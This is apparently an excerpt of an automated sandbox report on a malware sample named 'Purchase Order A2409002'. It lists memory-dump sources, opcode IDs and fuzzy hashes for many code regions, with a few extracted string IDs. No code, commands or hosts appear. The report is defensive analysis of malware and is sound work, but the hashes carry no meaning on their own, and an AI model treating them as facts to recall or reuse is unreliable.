                                        • Instruction Fuzzy Hash: C2E0C2B4D68208DBC704DF94E44096CBBB8EB89301F2080DDCC0827340CA325E42CB80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2324244085.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2f80000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4ac709061f7a89ab27e0b52c7c0998cdd9174be49d2cde52500955f8a0024f2f
                                        • Instruction ID: 0f34b42ee94e07df68448e97df6a1452f57c0f38cfe068760516488e54296489
                                        • Opcode Fuzzy Hash: 4ac709061f7a89ab27e0b52c7c0998cdd9174be49d2cde52500955f8a0024f2f
                                        • Instruction Fuzzy Hash: 08E01270E4030CEFCB94EFA9E00469CBBB4EB88301F6081AAC818A3300D7345A90CF80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c8f6fd61d19ac9f878127a5251ab643e7943913d6254fa7a9cc3f9165bdbaf6f
                                        • Instruction ID: 55dedb79c85d4d5c6952dc98b144671bc79ff45802ed3160ca6457ee290cfa41
                                        • Opcode Fuzzy Hash: c8f6fd61d19ac9f878127a5251ab643e7943913d6254fa7a9cc3f9165bdbaf6f
                                        • Instruction Fuzzy Hash: 32E01274A0420CEBDB00DFB5ED507BE77F6EB89210F1085A9D906D7340EA315F009B90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 34dc9e77caeb7c107563df03373aa36a924b125341fc6440b4115687908092f2
                                        • Instruction ID: 092deb9d1a23461eca919f17a5682dab9e10537a3c0dc33c07e92ba2ecc9fd09
                                        • Opcode Fuzzy Hash: 34dc9e77caeb7c107563df03373aa36a924b125341fc6440b4115687908092f2
                                        • Instruction Fuzzy Hash: 49E0C230A20118CFCB55EF14E8987AEB7B2EB49340F1081D9E10BA7391CB711D80CF51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e4b452473de2da25247c953305beed8322efd5e5a290d50ac492161e3a909424
                                        • Instruction ID: 84e73475d26671fad3e4376457c23bf557a6412100634ce8d982634283b86e28
                                        • Opcode Fuzzy Hash: e4b452473de2da25247c953305beed8322efd5e5a290d50ac492161e3a909424
                                        • Instruction Fuzzy Hash: 43E01231A04108EFCB40DFA9E90069D77F6DB89304F1041AA9909D3340E9316E049B91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7d27ee5b2dd285649b647a1227382c1d89cea9dd433b30392fa544f469fd6bbb
                                        • Instruction ID: 6d948b4a6bb52535713f83ae939e5acc5553805473011ef2c6929fc29c6b18d3
                                        • Opcode Fuzzy Hash: 7d27ee5b2dd285649b647a1227382c1d89cea9dd433b30392fa544f469fd6bbb
                                        • Instruction Fuzzy Hash: 87E0ED30950119DFCB60DF20E8487ADB772EF85310F0040E5910AA7780D7302D80DF80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f9b6960de91383ae3c7985b100726083825c402b03fc91edf6f01f04b8abfaec
                                        • Instruction ID: b465c8a99cd4f09123932bc8063a7d7081092695e2f51d7cd18ddcbaca51c98c
                                        • Opcode Fuzzy Hash: f9b6960de91383ae3c7985b100726083825c402b03fc91edf6f01f04b8abfaec
                                        • Instruction Fuzzy Hash: 65D0A7B4948108DBD744CB95E400B6AF7BCDB46215F1081DC881893381CA329D02CB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a0e3160f4079d88333fbdf5fb37dae7162089c6b9df064117c17be13e1b7eb7b
                                        • Instruction ID: bdac4dcb65d678241f80134cc2f49fc5c0865368e41aa71ec3de443a04b451a4
                                        • Opcode Fuzzy Hash: a0e3160f4079d88333fbdf5fb37dae7162089c6b9df064117c17be13e1b7eb7b
                                        • Instruction Fuzzy Hash: 31D01779101204ABCA009A54DC85C5AF76DAB88629714CA59B42A06292CF33EC13CAA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2324244085.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2f80000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8ca8b10047eed6bc608c71ab6faa6f21050b6702aba6be9761292dd228677fbb
                                        • Instruction ID: 6b8cf0f798958e0d668f47a5147baadf1102acea1e809becb0f131c7672dbddd
                                        • Opcode Fuzzy Hash: 8ca8b10047eed6bc608c71ab6faa6f21050b6702aba6be9761292dd228677fbb
                                        • Instruction Fuzzy Hash: A1E0E2B0D00258EFCB54EFB8A44469CBBB5AB04206F6041A98A08A7250E7319A94DF91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 00ba990ab7d6669b0f5f086865db1087e88624d48e42966535ff9c19212e3502
                                        • Instruction ID: e5eec9ad6819756b7f15d59ae7efb66f110081f77ccec294dd97b1898a694ee8
                                        • Opcode Fuzzy Hash: 00ba990ab7d6669b0f5f086865db1087e88624d48e42966535ff9c19212e3502
                                        • Instruction Fuzzy Hash: 4DE0C23094021A8FDBA4AB14E4987EDB7B2EF89300F1080E8911E67781DA302DC49F80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 60ecae6534187ab26e212f9447275c76cd5d2a54d518aeb1347957ca1ac55f56
                                        • Instruction ID: e7445e61105a9e5cddd0bd0f717797758c96de563cfa51f3ebd788113eab6f12
                                        • Opcode Fuzzy Hash: 60ecae6534187ab26e212f9447275c76cd5d2a54d518aeb1347957ca1ac55f56
                                        • Instruction Fuzzy Hash: B2E01A34A0021C8FCB54DF10D95ABAE77B2EF86301F0040D9D24A6B350CB701D80CF92
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 950207cf1c475099f068c61dfe1a17ce322672af291c390a24bc7cfafc9c4cd8
                                        • Instruction ID: 99e700561e3d3f375bdf70c2a26e8594cbe9e1657f03d65f009edc38403558c9
                                        • Opcode Fuzzy Hash: 950207cf1c475099f068c61dfe1a17ce322672af291c390a24bc7cfafc9c4cd8
                                        • Instruction Fuzzy Hash: DAE09A3494011ACFCB64EF64D9587BAB773EF4A301F1090E9DA0AA7784DA355D80EF45
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9d1f72f3140815bd7e452ebb7c1104a9b0f88e9a367fd0126106a32ba0de57ec
                                        • Instruction ID: 355e597d056841d3ca4e93264f26deb3726b661e6448c7c52d3391c3810b9ec0
                                        • Opcode Fuzzy Hash: 9d1f72f3140815bd7e452ebb7c1104a9b0f88e9a367fd0126106a32ba0de57ec
                                        • Instruction Fuzzy Hash: B0E0E5309A0218CFCB90EF50D8587A9B772EB88305F1080DA950A67340CA341D89CF60
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 95dfe1acd8cdd92642db7108490549375c9d76746f8ccb1df3deda0c563e2bb3
                                        • Instruction ID: 55fe7f3fc10ff71765d210c6bb68e3032dba0247223263df123b554b7a8e422c
                                        • Opcode Fuzzy Hash: 95dfe1acd8cdd92642db7108490549375c9d76746f8ccb1df3deda0c563e2bb3
                                        • Instruction Fuzzy Hash: 3FE09A70960218CFDB65DF65D858BA9B772FB89300F1050D9D50EA7354CB305D80DF61
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e901989a7a73bac2c13075d1e92df90cb8ba5d381136c07f27186cd9be82a64a
                                        • Instruction ID: 867c14ee7546d2fbad8c756b5b2489b7d8e53edd00c42fb35215e60fdaf0d199
                                        • Opcode Fuzzy Hash: e901989a7a73bac2c13075d1e92df90cb8ba5d381136c07f27186cd9be82a64a
                                        • Instruction Fuzzy Hash: 7FE0C230910218CFCB91DB20E4987AD7B72EB49300F1085D8910EA7380CB721D88CF54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 75333bfaf2c566cd02a5b99a08018c0c6dc9197a8a852023b88c3c710356c2ac
                                        • Instruction ID: c86c85728824feeb1d28800fad8adcb172b13c4a8c6b5f6b117d21759795eb0c
                                        • Opcode Fuzzy Hash: 75333bfaf2c566cd02a5b99a08018c0c6dc9197a8a852023b88c3c710356c2ac
                                        • Instruction Fuzzy Hash: 8BE01A3099021ACFEB54DF50E458BADB7B2EF45300F1090E9960A67780CB301D84CFB0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4d100a3fd1868bb505ee2c7339db70d3bf2a87c91e664be2bf74fcce14bf0956
                                        • Instruction ID: 362cae4d9f112464801eca327535cdc070693f76307cb35044523d5bf939c1c8
                                        • Opcode Fuzzy Hash: 4d100a3fd1868bb505ee2c7339db70d3bf2a87c91e664be2bf74fcce14bf0956
                                        • Instruction Fuzzy Hash: 5DD0C931708A278FDB659A2EF95069672E69F8C6143104679A989C7304EE60DD024BC0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0c7c2a78d0ef3fd1ac7fa18ee3c8e4ffb4a6238ea855df08c18591e98248c6b2
                                        • Instruction ID: 604f93da95db762b5e7bce63965540701f9ec214e252f4c51f81b54a736adbb8
                                        • Opcode Fuzzy Hash: 0c7c2a78d0ef3fd1ac7fa18ee3c8e4ffb4a6238ea855df08c18591e98248c6b2
                                        • Instruction Fuzzy Hash: C2D05E3000A388BFC3029B35DC44C453F68AF0B13431646D6F060CB1B2C6269854C7A2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ffae94ba4b6fd3f1928e7c198979244840410135a16c7758e521a8662a9f977c
                                        • Instruction ID: f288516b52e7e09428553afbc990c462a8d7e036a064520a046df47ca3d4d67a
                                        • Opcode Fuzzy Hash: ffae94ba4b6fd3f1928e7c198979244840410135a16c7758e521a8662a9f977c
                                        • Instruction Fuzzy Hash: BBD05E304093808FEFD28F24C904950BBE1EF9A324B0488EA91C4CB157C7364806DF92
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d8c83c245969ca7a28e1d027a43048e57807814792dd92d61bbff9d86930a1a2
                                        • Instruction ID: 11dc766fb24d15f5cf59f6b79b12d44b0017e2b2a2d472e5cc80c4625128929c
                                        • Opcode Fuzzy Hash: d8c83c245969ca7a28e1d027a43048e57807814792dd92d61bbff9d86930a1a2
                                        • Instruction Fuzzy Hash: EED022B2008308FB93002BA4E81499EBF585B48230780826CF064000D28E32542286B3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 971b3a2367b0a136a3b012e9fe0113eb469394787ab07baf4477bcd2133363f0
                                        • Instruction ID: 81ae6d3d39d69bc315dd7a5baf7dbf380e48f2edf01f7d980d83f0b157d6c54d
                                        • Opcode Fuzzy Hash: 971b3a2367b0a136a3b012e9fe0113eb469394787ab07baf4477bcd2133363f0
                                        • Instruction Fuzzy Hash: AAD012BA505348DFC340DFA9D884C947BA8EF5937431180D9FD8C4B272CB35A990CE55
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 002d9a090abde9ad19ad08587515f252771a9536a84a8e03f109cf9a34e8c25f
                                        • Instruction ID: ef4d2a942a7b4da981ac3f08fd1e0f4bab7d9ab42ecd4b370d8af33338657696
                                        • Opcode Fuzzy Hash: 002d9a090abde9ad19ad08587515f252771a9536a84a8e03f109cf9a34e8c25f
                                        • Instruction Fuzzy Hash: A6C00276E10119DF8F40DBDAE8418DDB7B5FFA4321B008026D624A7208D6306A66DF91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c834b85b27ec760333eee6c6350e4e39f49b22ab6d4c8e8e02a55e00feac2a3f
                                        • Instruction ID: 96bf5dd030dc61ec2fa9dac2871745959073ec0eb2716046d75de026d819555f
                                        • Opcode Fuzzy Hash: c834b85b27ec760333eee6c6350e4e39f49b22ab6d4c8e8e02a55e00feac2a3f
                                        • Instruction Fuzzy Hash: 27C08C31180209CFE3809F20E1987BA3B22EB82362F1090A852232B780CF340C84EB85
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 12bd1c381f2a88838c993ac7de1ba78b8dedff9c740d641053f27cd0843f7316
                                        • Instruction ID: b919d0d015a3b5e6d98a51eabce4cc721a12f1a4984c0f1f760f11d12dd57580
                                        • Opcode Fuzzy Hash: 12bd1c381f2a88838c993ac7de1ba78b8dedff9c740d641053f27cd0843f7316
                                        • Instruction Fuzzy Hash: DCC0C93115410ACFD7069B31E4486E8BB71EB42361F0400A5900656155DF6508C59A90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2344309221.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6d70000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 825acb6a5e30b40309a53b39350a02a4b5dbae39a100fd09032a59c58250b68a
                                        • Instruction ID: c463ac35ad68334639a9b03cd6ea93fdc3010a47d1c1142509a6f326daebf30d
                                        • Opcode Fuzzy Hash: 825acb6a5e30b40309a53b39350a02a4b5dbae39a100fd09032a59c58250b68a
                                        • Instruction Fuzzy Hash: 1CD0C930946219CFEB60DF25D88479DFB76FB85304F20649A8009A2245EB352E90CFC0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 91707402569b116241b56050182df6ada04bccb52f5ecd22ecca2e8710d2b098
                                        • Instruction ID: 41cd1d2b0c68b48d74acf7648c363627c1432f54c23c85ec32417c18f47f06f3
                                        • Opcode Fuzzy Hash: 91707402569b116241b56050182df6ada04bccb52f5ecd22ecca2e8710d2b098
                                        • Instruction Fuzzy Hash: 21C08C31040208EBC3004E88D844944FB68AF08200300C03DA94806002CB32A822DA80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9d2d114511592d20920ade5145606a2d530ee7714e32da4d4959f688afc060e3
                                        • Instruction ID: 78ee646c424a3fb89f870b198366d5840b17ef8a8193b8699e2c7aecf108be74
                                        • Opcode Fuzzy Hash: 9d2d114511592d20920ade5145606a2d530ee7714e32da4d4959f688afc060e3
                                        • Instruction Fuzzy Hash: 4DC04C75140208AF8744DF55D545C457B69EB5966071580A1F5054B631C672E8109A54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b14eefd21a6aab88a76c4525114aa68f5fa431e444d9ba609253556f8a89baa7
                                        • Instruction ID: 3a02b3b35743ba6eaa452a694e58ed2f0f473345e2fa63a98bf517616dba99cf
                                        • Opcode Fuzzy Hash: b14eefd21a6aab88a76c4525114aa68f5fa431e444d9ba609253556f8a89baa7
                                        • Instruction Fuzzy Hash: 38C08C35100208AF83008F54D444C407BA9EB082603008061F5094B231C232E810CA44
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4eb5f2d0361f99a5464d6694fd4ae59b706bce7c1cedd33f2ac58ae833214781
                                        • Instruction ID: e4731979068af14f6f52e1afb963a39bedf6614b1edab8838ea1a1a862092877
                                        • Opcode Fuzzy Hash: 4eb5f2d0361f99a5464d6694fd4ae59b706bce7c1cedd33f2ac58ae833214781
                                        • Instruction Fuzzy Hash: 71C0123024900ACFC3029F24E54C2B8BBB5AF47308F2442E4D0068B252CB3808049F85
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                        • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                        • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                        • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8a9505124dab49075dad047f034a2096b821ba56c74e47a2cd003b9bf32303d7
                                        • Instruction ID: 51d16fb98bb280fdfcec650ea90e53572e98cb7848252464026b29e9b9b51e2c
                                        • Opcode Fuzzy Hash: 8a9505124dab49075dad047f034a2096b821ba56c74e47a2cd003b9bf32303d7
                                        • Instruction Fuzzy Hash: 84B012A6807744384E4373314C014CD15C80D631313C01FCA8172500D1A814400B413A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 50e8ff7677ab7ab1f2fd8c4375ac63d8e9206a5a9bd44332ccd2764853c58b6f
                                        • Instruction ID: 6409554c7e1efa685bc6bfea3f38f547be56703c64c88ddb24109965f7a2c78f
                                        • Opcode Fuzzy Hash: 50e8ff7677ab7ab1f2fd8c4375ac63d8e9206a5a9bd44332ccd2764853c58b6f
                                        • Instruction Fuzzy Hash: 00B0923204020CAB97009A94E844955FB69AB59640740C029A609061128B33A822DAD4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 16ceb267b76ebaa1ee2513d7250311a2b412b8ff1e4035d3fb3b8e31766553eb
                                        • Instruction ID: 972c109ebd1c3a34dcd7610779f6212669699888db201c5a69eb098bc743f6d8
                                        • Opcode Fuzzy Hash: 16ceb267b76ebaa1ee2513d7250311a2b412b8ff1e4035d3fb3b8e31766553eb
                                        • Instruction Fuzzy Hash: 78B01271508200AFC7414F808A05B05F672AF64701F014815F7C844340C2300410DF11
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5cf959bf3ca510f2090f19cc19b2a53770a6d2cb32582e17edaee8bebdfff93c
                                        • Instruction ID: a181af09dd21eeefbd2702971c02a303d38a3bba8dcaefc29255bd6a993ec296
                                        • Opcode Fuzzy Hash: 5cf959bf3ca510f2090f19cc19b2a53770a6d2cb32582e17edaee8bebdfff93c
                                        • Instruction Fuzzy Hash:
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: bEl$$.%
                                        • API String ID: 0-3184111888
                                        • Opcode ID: 901a493f89cee390d6ea13f40e6c2320e3d398cc6e041407cff60428cc2c66e2
                                        • Instruction ID: 3143276c34e0530625bdcaf69c4fe307cf21d6aa85ccb011f5e0ddbbd53dd900
                                        • Opcode Fuzzy Hash: 901a493f89cee390d6ea13f40e6c2320e3d398cc6e041407cff60428cc2c66e2
                                        • Instruction Fuzzy Hash: FF13BF76540114EFDB868F94DD58E96BBB3FB8C310B1680D4E6099B236C732D8A1EF94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2344272105.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6d60000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: pVq$err
                                        • API String ID: 0-945179406
                                        • Opcode ID: bcd8f731af4684dcc420600105ee31d90d894647051c9f3f6fe7e6b4a3fbb0ee
                                        • Instruction ID: d1ab3f773b41dcc6b8eea15e0238e89deefd0d0907cb6301ffc7eba356b0fbfa
                                        • Opcode Fuzzy Hash: bcd8f731af4684dcc420600105ee31d90d894647051c9f3f6fe7e6b4a3fbb0ee
                                        • Instruction Fuzzy Hash: 4CE28F7190E394AFD7278BB58C54F9A7F79AF47300F1941DAE1809B2E3C2785848CB66
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2344272105.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6d60000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: pVq$err
                                        • API String ID: 0-945179406
                                        • Opcode ID: 3223a674b10cb381a5bdfb3cc7dab7d9baabe77599462e9931e306756ffff232
                                        • Instruction ID: aee574e332a7e35b4647199bdd4e9b1b0d21e55814aa4dfae754bb876467c282
                                        • Opcode Fuzzy Hash: 3223a674b10cb381a5bdfb3cc7dab7d9baabe77599462e9931e306756ffff232
                                        • Instruction Fuzzy Hash: 8DE28F7190A394AFD7278BB58C54F9A7F79AF47300F1941DAE1809B2E3C2785848CB66
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
